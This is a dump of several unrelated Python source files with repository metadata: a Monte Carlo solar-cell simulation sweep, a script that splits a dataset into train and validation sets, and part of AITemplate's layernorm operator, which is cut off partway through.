1e-2\r\nlow_tn_ETM=1e-5\r\nlow_tp_ETM=1e-5\r\nlow_A_ETM=2e4\r\nlow_thickness_ETM = 0.000001\r\nlow_num_donor = 1e13\r\n\r\nlow_Chi_absorber=3.5\r\nlow_Eg_Absorber=0.6\r\nlow_eps_absorber=2\r\nlow_Nc_absorber=2.2e19\r\nlow_Nv_absorber=3.9e19\r\nlow_mn_absorber=1e-2\r\nlow_mp_absorber=1e-2\r\nlow_tn_absorber=1e-5\r\nlow_tp_absorber=1e-5\r\nlow_A_absorber=2e4\r\nlow_thickness_absorber= 0.00003\r\n\r\n\r\n\r\n##### high:\r\n\r\n \r\n\r\n\r\nhigh_frontworkfunction = 5\r\nhigh_backworkfunction = 5.5 \r\n\r\n\r\n\r\nhigh_Chi_HTM= 4.2\r\nhigh_Eg_HTM= 2.55\r\nhigh_eps_HTM= 18\r\nhigh_Nc_HTM=2.5e21\r\nhigh_Nv_HTM=2.5e21\r\nhigh_mn_HTM=1e2\r\nhigh_mp_HTM=1e2\r\nhigh_tn_HTM=1e-3\r\nhigh_tp_HTM=1e-3\r\nhigh_A_HTM=2.1e4\r\nhigh_thickness_HTM = 0.00005\r\nhigh_numacceptor = 1e17\r\n\r\nhigh_Chi_ETM= 4.8\r\nhigh_Eg_ETM= 4\r\nhigh_eps_ETM= 18\r\nhigh_Nc_ETM=1e21\r\nhigh_Nv_ETM=1.8e21\r\nhigh_mn_ETM=1e2\r\nhigh_mp_ETM= 1e2\r\nhigh_tn_ETM=1e-3\r\nhigh_tp_ETM=1e-3\r\nhigh_A_ETM=2.1e4\r\nhigh_thickness_ETM = 0.00005\r\nhigh_num_donor = 2e17\r\n\r\nhigh_Chi_absorber= 4.5\r\nhigh_Eg_Absorber= 1.5\r\nhigh_eps_absorber=18\r\nhigh_Nc_absorber=2.5e21\r\nhigh_Nv_absorber=2.5e21\r\nhigh_mn_absorber=1e2\r\nhigh_mp_absorber=1e2\r\nhigh_tn_absorber=1e-3\r\nhigh_tp_absorber=1e-3\r\nhigh_A_absorber=2.1e4\r\nhigh_thickness_absorber= 0.001\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nfront = [frontworkfunction]\r\nback = [backworkfunction]\r\n\r\n\r\n\r\nHTM = [Chi_HTM,\r\n Eg_HTM,\r\n eps_HTM,\r\n Nc_HTM,\r\n Nv_HTM,\r\n mn_HTM,\r\n mp_HTM,\r\n tn_HTM,\r\n tp_HTM,\r\n A_HTM,\r\n thickness_HTM,\r\n numacceptor]\r\n\r\nETM = [Chi_ETM,\r\n Eg_ETM,\r\n eps_ETM,\r\n Nc_ETM,\r\n Nv_ETM,\r\n mn_ETM,\r\n mp_ETM,\r\n tn_ETM,\r\n tp_ETM,\r\n A_ETM,\r\n thickness_ETM,\r\n num_donor]\r\n\r\nabsorber = [Chi_absorber,\r\n Eg_Absorber,\r\n eps_absorber,\r\n Nc_absorber,\r\n Nv_absorber,\r\n mn_absorber,\r\n mp_absorber,\r\n tn_absorber,\r\n tp_absorber,\r\n A_absorber,\r\n thickness_absorber]\r\n\r\n\r\n\r\n\r\nc = 0\r\nfor i in HTM:\r\n HTM[c]=[]\r\n c=c+1\r\n\r\n\r\nc = 0\r\nfor i in ETM:\r\n ETM[c]=[]\r\n c=c+1\r\n\r\n\r\nc = 0\r\nfor i in absorber:\r\n absorber[c]=[]\r\n c=c+1\r\n\r\n\r\nc = 0\r\nfor i in front:\r\n front[c]=[]\r\n c=c+1\r\n\r\n\r\nc = 0\r\nfor i in back:\r\n back[c]=[]\r\n c=c+1\r\n\r\n\r\nfor i in range(0,1000000):\r\n \r\n front[0].extend([random.uniform(low_frontworkfunction,high_frontworkfunction)])\r\n back[0].extend([random.uniform(low_backworkfunction,high_backworkfunction)])\r\n\r\n \r\n \r\n HTM[0].extend([random.uniform(low_Chi_HTM,high_Chi_HTM)])\r\n HTM[1].extend([random.uniform(low_Eg_HTM,high_Eg_HTM)])\r\n HTM[2].extend([random.uniform(low_eps_HTM,high_eps_HTM)])\r\n HTM[3].extend([random.uniform(low_Nc_HTM,high_Nc_HTM)])\r\n HTM[4].extend([random.uniform(low_Nv_HTM,high_Nv_HTM)])\r\n HTM[5].extend([random.uniform(low_mn_HTM,high_mn_HTM)])\r\n HTM[6].extend([random.uniform(low_mp_HTM,high_mp_HTM)])\r\n HTM[7].extend([random.uniform(low_tn_HTM,high_tn_HTM)])\r\n HTM[8].extend([random.uniform(low_tp_HTM,high_tp_HTM)])\r\n HTM[9].extend([random.uniform(low_A_HTM,high_A_HTM)])\r\n HTM[10].extend([random.uniform(low_thickness_HTM,high_thickness_HTM)])\r\n HTM[11].extend([random.uniform(low_numacceptor,high_numacceptor)])\r\n\r\n\r\n ETM[0].extend([random.uniform(low_Chi_ETM,high_Chi_ETM)])\r\n ETM[1].extend([random.uniform(low_Eg_ETM,high_Eg_ETM)])\r\n ETM[2].extend([random.uniform(low_eps_ETM,high_eps_ETM)])\r\n ETM[3].extend([random.uniform(low_Nc_ETM,high_Nc_ETM)])\r\n 
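The sampler in this script tracks dozens of `low_*`/`high_*` scalar pairs plus index-addressed lists, which is easy to desynchronise. A sketch of the same uniform draw driven by a single bounds dict (only a few parameters shown; the bounds are copied from the script):

```python
# Hedged sketch: one bounds table replaces the parallel low_/high_ scalars
# and the numeric list indices. Only representative parameters are shown.
import random

BOUNDS = {
    "Chi_HTM": (2.0, 4.2),
    "Eg_HTM": (1.3, 2.55),
    "Nc_ETM": (2e19, 1e21),
    "thickness_absorber": (0.00003, 0.001),
}

def sample_params(bounds, rng=random):
    """One random design point: {name: value} drawn uniformly per parameter."""
    return {name: rng.uniform(lo, hi) for name, (lo, hi) in bounds.items()}

point = sample_params(BOUNDS)
print(point)   # e.g. {'Chi_HTM': 3.1..., 'Eg_HTM': 1.9..., ...}
```

Since several bounds span orders of magnitude (the densities of states run from roughly 2e19 to 2.5e21), a log-uniform draw would cover those ranges more evenly; the sketch keeps the script's plain `random.uniform` for fidelity.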
ETM[4].extend([random.uniform(low_Nv_ETM,high_Nv_ETM)])\r\n ETM[5].extend([random.uniform(low_mn_ETM,high_mn_ETM)])\r\n ETM[6].extend([random.uniform(low_mp_ETM,high_mp_ETM)])\r\n ETM[7].extend([random.uniform(low_tn_ETM,high_tn_ETM)])\r\n ETM[8].extend([random.uniform(low_tp_ETM,high_tp_ETM)])\r\n ETM[9].extend([random.uniform(low_A_ETM,high_A_ETM)])\r\n ETM[10].extend([random.uniform(low_thickness_ETM,high_thickness_ETM)])\r\n ETM[11].extend([random.uniform(low_num_donor,high_num_donor)])\r\n \r\n absorber[0].extend([random.uniform(low_Chi_absorber,high_Chi_absorber)])\r\n absorber[1].extend([random.uniform(low_Eg_Absorber,high_Eg_Absorber)])\r\n absorber[2].extend([random.uniform(low_eps_absorber,high_eps_absorber)])\r\n absorber[3].extend([random.uniform(low_Nc_absorber,high_Nc_absorber)])\r\n absorber[4].extend([random.uniform(low_Nv_absorber,high_Nv_absorber)])\r\n absorber[5].extend([random.uniform(low_mn_absorber,high_mn_absorber)])\r\n absorber[6].extend([random.uniform(low_mp_absorber,high_mp_absorber)])\r\n absorber[7].extend([random.uniform(low_tn_absorber,high_tn_absorber)])\r\n absorber[8].extend([random.uniform(low_tp_absorber,high_tp_absorber)])\r\n absorber[9].extend([random.uniform(low_A_absorber,high_A_absorber)])\r\n absorber[10].extend([random.uniform(low_thickness_absorber,high_thickness_absorber)])\r\n \r\n # absorber[0].extend([random.uniform(low_thickness_absorber,high_thickness_absorber)])\r\n\r\n\r\n\r\n\r\n\r\n# print(HTM)\r\n# print(ETM)\r\n# print(absorber)\r\n\r\n\r\nChi_HTM_=[]\r\nEg_HTM_=[]\r\neps_HTM_=[]\r\nNc_HTM_=[]\r\nNv_HTM_=[]\r\nmn_HTM_=[]\r\nmp_HTM_=[]\r\ntn_HTM_=[]\r\ntp_HTM_=[]\r\nA_HTM_=[]\r\nthickness_HTM_ = []\r\nnumacceptor_ = []\r\n\r\n\r\n\r\nChi_ETM_=[]\r\nEg_ETM_=[]\r\neps_ETM_=[]\r\nNc_ETM_=[]\r\nNv_ETM_=[]\r\nmn_ETM_=[]\r\nmp_ETM_=[]\r\ntn_ETM_=[]\r\ntp_ETM_=[]\r\nA_ETM_=[]\r\nthickness_ETM_ = []\r\nnum_donor_ = []\r\n\r\n\r\nChi_absorber_=[]\r\nEg_Absorber_=[]\r\neps_absorber_=[]\r\nNc_absorber_=[]\r\nNv_absorber_=[]\r\nmn_absorber_=[]\r\nmp_absorber_=[]\r\ntn_absorber_=[]\r\ntp_absorber_=[]\r\nA_absorber_=[]\r\nthickness_absorber_=[]\r\n\r\ncurrent_ = []\r\nvoltage_ = []\r\neffeciency_ =[] \r\nr=0\r\nc=0\r\nfor i in range(0,1000000):\r\n \r\n frontworkfunction = float(front[0][c])\r\n backworkfunction = float(back[0][c]) \r\n \r\n Chi_HTM=float(HTM[0][c])\r\n Eg_HTM=float(HTM[1][c])\r\n eps_HTM=float(HTM[2][c])\r\n Nc_HTM=float(HTM[3][c])\r\n Nv_HTM=float(HTM[4][c])\r\n mn_HTM=float(HTM[5][c])\r\n mp_HTM=float(HTM[6][c])\r\n tn_HTM=float(HTM[7][c])\r\n tp_HTM=float(HTM[8][c])\r\n A_HTM=float(HTM[9][c])\r\n thickness_HTM = float(HTM[10][c])\r\n numacceptor = float(HTM[11][c])\r\n\r\n \r\n \r\n Chi_ETM=float(ETM[0][c])\r\n Eg_ETM=float(ETM[1][c])\r\n eps_ETM=float(ETM[2][c])\r\n Nc_ETM=float(ETM[3][c])\r\n Nv_ETM=float(ETM[4][c])\r\n mn_ETM=float(ETM[5][c])\r\n mp_ETM=float(ETM[6][c])\r\n tn_ETM=float(ETM[7][c])\r\n tp_ETM=float(ETM[8][c])\r\n A_ETM=float(ETM[9][c])\r\n thickness_ETM = float(ETM[10][c])\r\n num_donor = float(ETM[11][c])\r\n\r\n\r\n\r\n Chi_absorber= float(absorber[0][c])\r\n Eg_Absorber=float(absorber[1][c])\r\n eps_absorber=float(absorber[2][c])\r\n Nc_absorber=float(absorber[3][c])\r\n Nv_absorber=float(absorber[4][c])\r\n mn_absorber=float(absorber[5][c])\r\n mp_absorber=float(absorber[6][c])\r\n tn_absorber=float(absorber[7][c])\r\n tp_absorber=float(absorber[8][c])\r\n A_absorber=float(absorber[9][c])\r\n thickness_absorber= float(absorber[10][c])\r\n \r\n if (Chi_ETM - frontworkfunction) > 0:\r\n c=c+1\r\n 
print('1' ,Chi_ETM, frontworkfunction)\r\n continue\r\n elif (Chi_ETM - Chi_absorber) < 0:\r\n c=c+1\r\n print('2',Chi_ETM , Chi_absorber)\r\n continue\r\n elif (backworkfunction-Chi_HTM-Eg_HTM) > 0:\r\n c=c+1\r\n print('3',backworkfunction,Chi_HTM,Eg_HTM)\r\n continue\r\n elif (Chi_HTM+Eg_HTM-Chi_absorber-Eg_Absorber) > 0:\r\n c=c+1\r\n print('4',Chi_HTM,Eg_HTM,Chi_absorber,Eg_Absorber)\r\n continue\r\n elif (Chi_absorber-Chi_ETM)>0:\r\n c=c+1\r\n print('5',Chi_absorber,Chi_ETM)\r\n continue\r\n else: \r\n \r\n material_HTM = dpv.create_material(Chi=Chi_HTM,\r\n Eg=Eg_HTM,\r\n eps=eps_HTM,\r\n Nc=Nc_HTM,\r\n Nv=Nv_HTM,\r\n # Ndop= 1,\r\n mn=mn_HTM,\r\n mp=mp_HTM,\r\n tn=tn_HTM,\r\n tp=tp_HTM,\r\n A=A_HTM) \r\n \r\n \r\n material_absorber = dpv.create_material(Chi=Chi_absorber,\r\n Eg=Eg_Absorber,\r\n eps=eps_absorber,\r\n Nc=Nc_absorber,\r\n Nv=Nv_absorber,\r\n # Ndop= 1,\r\n mn=mn_absorber,\r\n mp=mp_absorber,\r\n tn=tn_absorber,\r\n tp=tp_absorber,\r\n A=A_absorber) \r\n \r\n material_ETM = dpv.create_material(Chi=Chi_ETM,\r\n Eg=Eg_ETM,\r\n eps=eps_ETM,\r\n Nc=Nc_ETM,\r\n Nv=Nv_ETM,\r\n mn=mn_ETM,\r\n mp=mp_ETM,\r\n tn=tn_ETM,\r\n tp=tp_ETM,\r\n A=A_ETM) \r\n \r\n \r\n des = dpv.make_design(n_points=500,\r\n Ls=[thickness_ETM, thickness_absorber, thickness_HTM],\r\n mats=[material_ETM, material_absorber, material_HTM],\r\n Ns=[num_donor, 0, -numacceptor],\r\n Snl=1.16e7, Snr=1.16e7, Spl=1.16e7, Spr=1.16e7,\r\n PhiM0 = frontworkfunction ,\r\n PhiML = backworkfunction)\r\n \r\n \r\n ls = dpv.incident_light() \r\n try:\r\n \r\n results = dpv.simulate(des,ls) \r\n except:\r\n c=c+1\r\n continue\r\n else:\r\n \r\n voltage = results[\"iv\"][0]\r\n current = results[\"iv\"][1]\r\n current = (10**3)*current #mA/cm^2\r\n effeciency = results[\"eff\"]\r\n \r\n \r\n \r\n current_.append(float(current[0]))\r\n voltage_.append(float(voltage[-1]))\r\n effeciency_.append(float(effeciency))\r\n Chi_HTM_.append(float(Chi_HTM))\r\n Eg_HTM_.append(float(Eg_HTM))\r\n eps_HTM_.append(float(eps_HTM))\r\n Nc_HTM_.append(float(Nc_HTM))\r\n Nv_HTM_.append(float(Nv_HTM))\r\n mn_HTM_.append(float(mn_HTM))\r\n mp_HTM_.append(float(mp_HTM))\r\n tn_HTM_.append(float(tn_HTM))\r\n tp_HTM_.append(float(tp_HTM))\r\n A_HTM_.append(float(A_HTM))\r\n thickness_HTM_.append(float(thickness_HTM))\r\n numacceptor_.append(float(numacceptor))\r\n \r\n \r\n Chi_ETM_.append(float(Chi_ETM))\r\n Eg_ETM_.append(float(Eg_ETM))\r\n eps_ETM_.append(float(eps_ETM))\r\n Nc_ETM_.append(float(Nc_ETM))\r\n Nv_ETM_.append(float(Nv_ETM))\r\n mn_ETM_.append(float(mn_ETM))\r\n mp_ETM_.append(float(mp_ETM))\r\n tn_ETM_.append(float(tn_ETM))\r\n tp_ETM_.append(float(tp_ETM))\r\n A_ETM_.append(float(A_ETM))\r\n thickness_ETM_.append(float(thickness_ETM))\r\n num_donor_.append(float(num_donor)) \r\n \r\n Chi_absorber_.append(float(Chi_absorber))\r\n Eg_Absorber_.append(float(Eg_Absorber))\r\n eps_absorber_.append(float(eps_absorber))\r\n Nc_absorber_.append(float(Nc_absorber))\r\n Nv_absorber_.append(float(Nv_absorber))\r\n mn_absorber_.append(float(mn_absorber))\r\n mp_absorber_.append(float(mp_absorber))\r\n tn_absorber_.append(float(tn_absorber))\r\n tp_absorber_.append(float(tp_absorber))\r\n A_absorber_.append(float(A_absorber))\r\n thickness_absorber_.append(float(thickness_absorber))\r\n \r\n c =c+1\r\n r=r+1\r\n if r==10000 :\r\n break\r\n \r\n \r\ndata = pd.DataFrame({\r\n\r\n \r\n 'Chi_HTM_' : (Chi_HTM_),\r\n 'Eg_HTM_' : (Eg_HTM_),\r\n 'eps_HTM_': (eps_HTM_),\r\n 'Nc_HTM_': (Nc_HTM_),\r\n 'Nv_HTM_': (Nv_HTM_),\r\n 'mn_HTM_': 
(Nv_HTM_),\r\n 'mp_HTM_': (mp_HTM_),\r\n 'tn_HTM_': (tn_HTM_),\r\n 'tp_HTM_': (tp_HTM_),\r\n 'A_HTM_': (A_HTM_),\r\n 'thickness_HTM_': (thickness_HTM_),\r\n 'numacceprot_' : (numacceptor_),\r\n \r\n 'Chi_ETM_' : (Chi_ETM_),\r\n 'Eg_ETM_' : (Eg_ETM_),\r\n 'eps_ETM_': (eps_ETM_),\r\n 'Nc_ETM_': (Nc_ETM_),\r\n 'Nv_ETM_': (Nv_ETM_),\r\n 'mn_ETM_': (Nv_ETM_),\r\n 'mp_ETM_': (mp_ETM_),\r\n 'tn_ETM_': (tn_ETM_),\r\n 'tp_ETM_': (tp_ETM_),\r\n 'A_ETM_': (A_ETM_),\r\n 'thickness_ETM_': (thickness_ETM_),\r\n 'num_donor_' : (num_donor_),\r\n \r\n 'Chi_absorber_' : (Chi_absorber_),\r\n 'Eg_absorber_' : (Eg_Absorber_),\r\n 'eps_absorber_': (eps_absorber_),\r\n 'Nc_absorber_': (Nc_absorber_),\r\n 'Nv_absorber_': (Nv_absorber_),\r\n 'mn_absorber_': (Nv_absorber_),\r\n 'mp_absorber_': (mp_absorber_),\r\n 'tn_absorber_': (tn_absorber_),\r\n 'tp_absorber_': (tp_absorber_),\r\n 'A_absorber_': (A_absorber_),\r\n 'thickness_absorber_' : (thickness_absorber_),\r\n \r\n \r\n 'OCvoltage' : (voltage_),\r\n 'SCcurrent' : (current_),\r\n 'effeciency' : (effeciency_)\r\n \r\n\r\n\r\n })\r\ndata.to_excel(\"___10000datapoints.xlsx\")\r\n\r\n\r\n \r\n\r\n\r\n","repo_name":"ALBURAYHKARIM/usage-of-Machine-learning-to-maximizing-the-efficiency-of-solar-cells","sub_path":"code/SolarSimulationSimulator3.py","file_name":"SolarSimulationSimulator3.py","file_ext":"py","file_size_in_byte":15431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32357123684","text":"import pandas as pd\nimport numpy as np\n\nif __name__ == '__main__':\n train_ids_file = '../data/splits/train_semeval_parids-labels.csv'\n val_ids_file = '../data/splits/dev_semeval_parids-labels.csv'\n\n # columns = [par_id, label]\n train_ids = pd.read_csv(train_ids_file)\n train_ids = train_ids.rename(columns={'label': 'label_in_split_file'})\n val_ids = pd.read_csv(val_ids_file)\n val_ids = val_ids.rename(columns={'label': 'label_in_split_file'})\n print(f'Number of train samples: {len(train_ids)}')\n print(f'Number of val samples: {len(val_ids)}')\n #print(train_ids.columns)\n #print(val_ids.columns)\n\n task1_data_file = '../data/full_baseline/task1.csv'\n task2_data_file = '../data/full_baseline/task2.csv'\n #task2_data_file = '../raw_data/task2_ner_tags_updated.csv'\n\n task1_df = pd.read_csv(task1_data_file)\n task2_df = pd.read_csv(task2_data_file)\n print(f'Number of task 1 samples: {len(task1_df)}')\n print(f'Number of task 2 samples: {len(task2_df)}')\n #print(task1_df.columns)\n #print(task2_df.columns)\n\n task1_train = pd.merge(task1_df, train_ids, how='right', on='par_id')\n task1_val = pd.merge(task1_df, val_ids, how='right', on='par_id')\n print(f'Number of task 1 train: {len(task1_train)}')\n print(f'Number of task 1 val: {len(task1_val)}')\n assert len(task1_train) + len(task1_val) == len(task1_df)\n #print(task1_train.head())\n assert np.sum(task1_train['label'].isnull()) == 0\n assert np.sum(task1_val['label'].isnull()) == 0\n\n task1_train.to_csv('../data/split_baseline/task1_train.csv', index=False)\n task1_val.to_csv('../data/split_baseline/task1_val.csv', index=False)\n\n task2_train = pd.merge(task2_df, train_ids, how='inner', on='par_id')\n task2_val = pd.merge(task2_df, val_ids, how='inner', on='par_id')\n print(f'Number of task 2 train: {len(task2_train)}')\n print(f'Number of task 2 val: {len(task2_val)}')\n\n assert len(task2_train) + len(task2_val) == len(task2_df)\n\n #assert np.sum(task2_train['label'].isnull()) + np.sum(task2_val['label'].isnull()) == 
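When the results table is assembled above, the `DataFrame` literal maps `'mn_HTM_'`, `'mn_ETM_'` and `'mn_absorber_'` to the corresponding `Nv_*_` lists, so the mobility columns are silently overwritten with densities of states. Building the frame from one dict keyed by column name avoids that class of copy-paste slip; the schema below is abbreviated:

```python
# Hedged sketch: a single dict of lists as the schema's source of truth.
# Note the original literal assigns the Nv_* lists to the mn_* columns,
# a copy-paste slip this construction makes much harder to commit.
import pandas as pd

results = {name: [] for name in (
    "Chi_HTM_", "Eg_HTM_", "mn_HTM_", "Nv_HTM_",   # full column list elided
    "OCvoltage", "SCcurrent", "effeciency",
)}

def record(row: dict):
    """Append one simulated design point; keys must match the schema."""
    for name, value in row.items():
        results[name].append(value)

record({"Chi_HTM_": 2.5, "Eg_HTM_": 1.8, "mn_HTM_": 12.0, "Nv_HTM_": 1e20,
        "OCvoltage": 1.1, "SCcurrent": 22.3, "effeciency": 18.7})

pd.DataFrame(results).to_excel("___10000datapoints.xlsx", index=False)
```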
np.sum(task1_df['label'] == 0)\n\n task2_train.to_csv('../data/split_baseline/task2_train.csv', index=False)\n task2_val.to_csv('../data/split_baseline/task2_val.csv', index=False)\n #task2_train.to_csv('../data/split_ner/task2_train.csv', index=False)\n #task2_val.to_csv('../data/split_ner/task2_val.csv', index=False)\n\n # create toy examples for model development\n # Task 1: select 50 samples for each class\n task1_toy_df = task1_train.groupby('label').sample(n=50, random_state=1)\n # Task 2: select 100 samples in total, regardless of labels\n task2_toy_df = task2_train.sample(n=100, random_state=1)\n\n task1_toy_df.to_csv('../data/new_toy_baseline/task1.csv')\n task2_toy_df.to_csv('../data/new_toy_baseline/task2.csv')\n\n\n","repo_name":"karenacorn99/PCL_detection","sub_path":"code/create_train_val_splits.py","file_name":"create_train_val_splits.py","file_ext":"py","file_size_in_byte":2838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19818353010","text":"import logging\nimport os\nimport re\nfrom collections import OrderedDict\nfrom hashlib import sha1\nfrom operator import itemgetter\nfrom typing import Any, List, Union\n\nimport jinja2\n\nfrom aitemplate import backend\nfrom aitemplate.backend import registry\nfrom aitemplate.backend.target import Target\nfrom aitemplate.compiler.base import (\n DynamicProfileStrategy,\n ExecItem,\n IntImm,\n IntVar,\n Operator,\n Tensor,\n)\nfrom aitemplate.compiler.ops.softmax.cache_entry import NormQueryEntry, NormRecordEntry\nfrom aitemplate.compiler.tensor_accessor import TensorAccessor\n\nfrom aitemplate.testing import detect_target\nfrom aitemplate.utils import shape_utils\n\n# pylint: disable=C0103,W0221,W0102,W0223\n\n\n_LOGGER = logging.getLogger(__name__)\n\nEXEC_COND_TEMPLATE = jinja2.Template(\n \"\"\"\n{{indent}}if ({{cond}}) {\n{{indent}} {{program}}\n{{indent}}}\n\"\"\"\n)\n\n\nclass layernorm(Operator):\n \"\"\"Standalone layernorm op.\n Applies Layer Normalization over a mini-batch of inputs as described in the\n paper Layer Normalization. 
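The toy-split code above uses `groupby('label').sample(n=50)` for a class-balanced draw. A small sketch of the behaviour, including the failure mode when a class is smaller than `n`:

```python
# Hedged sketch of the class-balanced toy sampling: groupby + sample draws
# the same number of rows per label value.
import pandas as pd

df = pd.DataFrame({
    "par_id": range(8),
    "label":  [0, 0, 0, 0, 1, 1, 1, 1],
})

toy = df.groupby("label").sample(n=2, random_state=1)
print(toy["label"].value_counts())   # 2 rows for label 0, 2 for label 1

# With replace=False (the default), asking for more rows than the smallest
# class contains raises ValueError; pass replace=True or shrink n to avoid it.
```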
The mean and standard-deviation are calculated\n over the last D dimensions, where D is the dimension of normalized_shape.\n Input shape: [M0, M1, ..., Mp, N1, N2, ..., ND]\n Normalized_shape: [N1, N2, ..., ND]\n Gamma/Beta, if not None, have the same shape as normalized_shape.\n \"\"\"\n\n def __init__(self, normalized_shape: List[IntImm] = None) -> None:\n super().__init__()\n self._attrs[\"op\"] = \"layernorm\"\n self._attrs[\"has_profiler\"] = False\n if detect_target().name() == \"rocm\":\n self._attrs[\"has_profiler\"] = True\n self._attrs[\"default_normalized_shape\"] = normalized_shape\n self._attrs[\"normalized_shape\"] = []\n\n @staticmethod\n def check_shapes(x_shapes, gamma_shapes, beta_shapes, normalized_shape):\n if len(normalized_shape) >= len(x_shapes):\n raise NotImplementedError(\n f\"Layernorm normalized_shape length must be smaller than the input.\"\n f\"Current normalized_shape: {normalized_shape}, input shape: {x_shapes}\"\n )\n\n def _check_param_shapes(x_shapes, param_shapes, param_name):\n if param_name != \"normalized\" and not param_shapes:\n return\n for shape in param_shapes:\n if not isinstance(shape, IntImm):\n raise NotImplementedError(\n f\"Layernorm {param_name} shape must be immutable values.\"\n f\"Current value: {param_shapes}\"\n )\n\n batch_ndims = len(x_shapes) - len(param_shapes)\n for i in range(len(param_shapes)):\n if param_shapes[i].value() != x_shapes[batch_ndims + i].value():\n raise RuntimeError(\n f\"Layernorm {param_name} shape is not compatible with input shape. \"\n f\"{param_name} shape: {param_shapes}, input shape: {x_shapes}\"\n )\n\n _check_param_shapes(x_shapes, gamma_shapes, \"gamma\")\n _check_param_shapes(x_shapes, beta_shapes, \"beta\")\n _check_param_shapes(x_shapes, normalized_shape, \"normalized\")\n\n @staticmethod\n def get_input_shapes(x, gamma, beta) -> List[List[Union[IntVar, IntImm]]]:\n \"\"\"\n Return a list of shapes for x, gamma and beta, where gamma_shape and\n beta_shape may be None if gamma and beta are None, respectively.\n \"\"\"\n x_shape = x._attrs[\"shape\"]\n # gamma and beta can be None.\n gamma_shape = None\n if gamma is not None:\n gamma_shape = gamma._attrs[\"shape\"]\n beta_shape = None\n if beta is not None:\n beta_shape = beta._attrs[\"shape\"]\n return [x_shape, gamma_shape, beta_shape]\n\n def _sanity_check(self, x, gamma, beta):\n normalized_shape = self._attrs[\"normalized_shape\"]\n\n # size() op can introduce up to 1 more input per normalized dim\n input_len = len(self._attrs[\"inputs\"])\n max_input_len = 3 + len(normalized_shape)\n if input_len < 1 or input_len > max_input_len:\n raise NotImplementedError(\n f\"Expect 1 ~ {max_input_len} inputs for Layernorm. 
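The docstring describes normalisation over the trailing `D` dims given by `normalized_shape`, with `gamma`/`beta` broadcast elementwise. A reference implementation of exactly those semantics, checked against `torch.nn.functional.layer_norm`:

```python
# Hedged sketch of the layernorm semantics in the docstring: statistics over
# the last len(normalized_shape) dims, biased variance, then scale and shift.
import torch

def layernorm_ref(x, normalized_shape, gamma=None, beta=None, eps=1e-5):
    dims = tuple(range(x.dim() - len(normalized_shape), x.dim()))
    mean = x.mean(dim=dims, keepdim=True)
    var = x.var(dim=dims, unbiased=False, keepdim=True)
    y = (x - mean) / torch.sqrt(var + eps)
    if gamma is not None:
        y = y * gamma    # gamma/beta have the same shape as normalized_shape
    if beta is not None:
        y = y + beta
    return y

x = torch.randn(2, 3, 8)   # batch dims (2, 3), normalized over the last dim
out = layernorm_ref(x, (8,), torch.ones(8), torch.zeros(8))
assert torch.allclose(out, torch.nn.functional.layer_norm(x, (8,)), atol=1e-5)
```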
Actual #inputs: {input_len}\"\n )\n (x_shape, gamma_shape, beta_shape) = layernorm.get_input_shapes(x, gamma, beta)\n\n expected_dtype = x.dtype()\n for (param, name) in ((gamma, \"gamma\"), (beta, \"beta\")):\n if param is not None and param.dtype() != expected_dtype:\n raise NotImplementedError(\n f\"Layernorm doesn't support type promotions; expected {expected_dtype} but got {name} with dtype {param.dtype()}\"\n )\n\n layernorm.check_shapes(x_shape, gamma_shape, beta_shape, normalized_shape)\n\n def _infer_shapes(self, x: Tensor):\n \"\"\"Infer shapes for layernorm.\"\"\"\n\n return x._attrs[\"shape\"]\n\n def __call__(\n self,\n x: Tensor,\n gamma: Tensor = None,\n beta: Tensor = None,\n normalized_shape: List[Any] = None,\n eps: float = 1e-5,\n ) -> Tensor:\n inputs = [x]\n self._attrs[\"gamma_constant\"] = \"1.0\"\n self._attrs[\"beta_constant\"] = \"0.0\"\n if gamma is not None:\n self._attrs[\"gamma_constant\"] = None\n inputs.append(gamma)\n if beta is not None:\n self._attrs[\"beta_constant\"] = None\n inputs.append(beta)\n if normalized_shape is not None:\n new_norm_shape = shape_utils.convert_shape_to_IntVar(normalized_shape)\n # Only add source of dynamic dim to inputs\n for old_shape, new_shape in zip(normalized_shape, new_norm_shape):\n if not isinstance(new_shape, IntImm):\n inputs.append(old_shape)\n self._attrs[\"normalized_shape\"] = new_norm_shape\n else:\n self._attrs[\"normalized_shape\"] = self._attrs[\"default_normalized_shape\"]\n assert isinstance(eps, float), f\"eps must be float, instead it is {type(eps)}\"\n self._attrs[\"eps\"] = eps\n self._attrs[\"inputs\"] = inputs\n self._attrs[\"input_accessors\"] = [TensorAccessor(x)]\n self._sanity_check(x, gamma, beta)\n self._set_depth()\n output_shape = self._infer_shapes(x)\n output = Tensor(output_shape, src_ops={self}, dtype=x.dtype())\n self._attrs[\"outputs\"] = [output]\n self._attrs[\"output_accessors\"] = [TensorAccessor(output)]\n return output\n\n def gen_function(self) -> str:\n target = backend.target.Target.current()\n func_key = \"{target}.{op}.gen_function\".format(\n target=target.name(), op=self._attrs[\"op\"]\n )\n self._attrs[\"exec_cond_template\"] = EXEC_COND_TEMPLATE\n func = registry.get(func_key)\n return func(self._attrs)\n\n def _invert_exec_key(self, key):\n \"\"\"Invert execution key to get input arguments as integers.\n\n Parameters\n ----------\n key : str\n Execution key\n\n Returns\n ----------\n List[int]\n \"\"\"\n res = []\n for item in re.split(\" == | && \", key):\n if item.isnumeric():\n res.append(int(item))\n return res\n\n def _gen_exec_key(self, name_value_mapping):\n \"\"\"Generate execution key from the name value mapping.\n\n Parameters\n ----------\n name_value_mapping : Dict[str, Union[int, List[int]]\n Dict for name and value.\n\n Returns\n ----------\n str\n \"\"\"\n key_strs = []\n for name, values in name_value_mapping.items():\n if len(values) == 1:\n key_strs.append(f\"{name} == {values[0]}\")\n elif len(values) > 1:\n key_strs.append(f\"{name} >= {values[0]} && {name} <= {values[-1]}\")\n else:\n raise RuntimeError(\n \"Softmax input has empty dim values: {}\".format(values)\n )\n return \" && \".join(key_strs)\n\n def _extract_exec_path(self, dynamic_profiling_strategy=DynamicProfileStrategy.MAX):\n \"\"\"Extract execution key, i.e. input arguments for the profiler.\n\n Parameters\n ----------\n dynamic_profiling_strategy: DynamicProfileStrategy, optional\n A dynamic profiling strategy. By default MAX is used, i.e. 
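`_gen_exec_key` and `_invert_exec_key` above round-trip profiler arguments through a human-readable condition string: single-value dims become equality clauses whose numbers are recovered by token splitting, while ranged dims become the runtime `exec_cond`. A standalone sketch of that mechanism:

```python
# Hedged sketch of the exec-key round trip: the profiling key is inverted
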